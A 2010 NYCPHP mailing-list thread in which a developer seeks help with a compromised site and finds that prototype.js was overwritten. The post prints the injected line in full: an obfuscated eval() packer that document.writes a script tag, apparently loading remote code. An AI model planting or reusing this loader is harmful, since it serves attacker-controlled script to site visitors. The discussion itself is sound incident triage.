NYCPHP Meetup

[Chris French]

I found the problem, somehow prototype.js was over writen with a version containing
 
some bad code. 

on line 198 : 

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 3="";0 5="6"+"7"+"8"+"9";0 4=5.a("b");c(0 2=1;2<4.d;2++){3+=e.f(4[2])}g.h(3);',18,18,'var||u9d|yd8|te1269|n92617|t360t3115t399t3114t3105t3112t3116t332t3108t397t3110t3103t3117t397t3103t3101t361t334t3106t397t3118|t397t3115t399t3114t3105t3112t3116t334t332t3115t3114t399t361t334t3104t3116t3116t3112t358t347t347|t351t3114t3100t399t3108t3105t399t3107t346t3110t3101t3116t347t397t3110t397t3108t3105t3122t3101t346|t3106t3115t334t362t360t347t3115t399t3114t3105t3112t3116t362|split|t3|for|length|String|fromCharCode|document|write'.split('|'),0,{}));


Chris

On Nov 24, 2010, at 12:13 PM, Chris French wrote:

> So, This isn't exactly joomla related, I am currently moving a site over to joomla. But the old site is expoilted and i need some advice on where to look to fix it. 
> 
> When i view the page source, I don't see this however when i view the site from google chrome inspect element of firebug I do  see it. 
> 
> Looking through all the files on the server, I cant find any files that have been accessed or that have this script. 
> 
> which leads me to think maybe some where some javascript is adding this. anyhow here is what i see. at the top of my page even before the head of my normal html is included a really really nasty loop of iframes. i didn't include the actual code incase it would run on your system 
> 
> what are some ways that someone could include this into my head of my site? as far as i can fine the sites files haven't been accessed.
> 
> 
> <Screen shot 2010-11-24 at 12.09.05 PM.png>